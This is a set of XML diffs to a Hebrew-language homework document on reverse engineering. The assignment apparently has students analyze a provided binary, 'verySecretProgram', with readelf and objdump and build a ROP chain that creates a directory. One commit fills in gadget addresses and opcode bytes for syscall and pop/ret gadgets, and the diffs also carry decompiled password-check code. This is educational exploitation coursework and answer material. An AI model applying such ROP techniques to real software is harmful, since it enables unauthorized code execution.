-        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
-      </w:r>
+        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>בינארים</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6955,8 +7687,20 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>\xHH</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xHH</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7412,6 +8156,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7422,6 +8167,7 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7474,7 +8220,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אוקטלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7498,6 +8268,7 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7508,6 +8279,7 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>

</xml_diff>

<commit_message>
encoded 3 instructions in dry
</commit_message>
<xml_diff>
--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -6817,6 +6817,28 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>4016B0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6837,6 +6859,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0f 05</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6892,6 +6925,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x400e71</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6912,6 +6956,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>58 c3</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6999,6 +7054,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x401da0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7019,6 +7085,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>5e 41 5f c3</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>

</xml_diff>

<commit_message>
finished dry. need to explain last question
</commit_message>
<xml_diff>
--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,8 +453,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> טאוב</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>טאוב</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -469,8 +479,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>באת"מ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -535,6 +555,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -542,13 +563,32 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>המוצרף</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -558,13 +598,31 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump, readelf</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -608,6 +666,7 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -615,6 +674,7 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -694,8 +754,17 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Reverse Engenering</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Engenering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -805,14 +874,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -934,14 +1023,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -2119,6 +2228,7 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2126,6 +2236,7 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2148,8 +2259,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>להשתחזר</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2305,7 +2426,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2365,6 +2520,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2385,6 +2541,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2413,6 +2570,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2443,6 +2601,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2509,8 +2668,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c = *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2589,6 +2760,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2609,6 +2781,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2657,6 +2830,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2677,6 +2851,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2761,8 +2936,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c){</w:t>
-      </w:r>
+        <w:t>(c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2809,7 +2996,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; 1</w:t>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2821,6 +3019,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2899,6 +3098,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2919,6 +3119,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2973,8 +3174,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s++;</w:t>
-      </w:r>
+        <w:t>          s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3069,8 +3282,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sum;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>sum;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3155,7 +3380,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3193,8 +3452,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>char* copy = s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">char* copy = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3241,7 +3512,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPasswordAux(s) &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3253,6 +3546,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3273,6 +3567,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3331,6 +3626,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3351,6 +3647,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3405,8 +3702,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>     s = copy;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">     s = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>copy;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3455,6 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
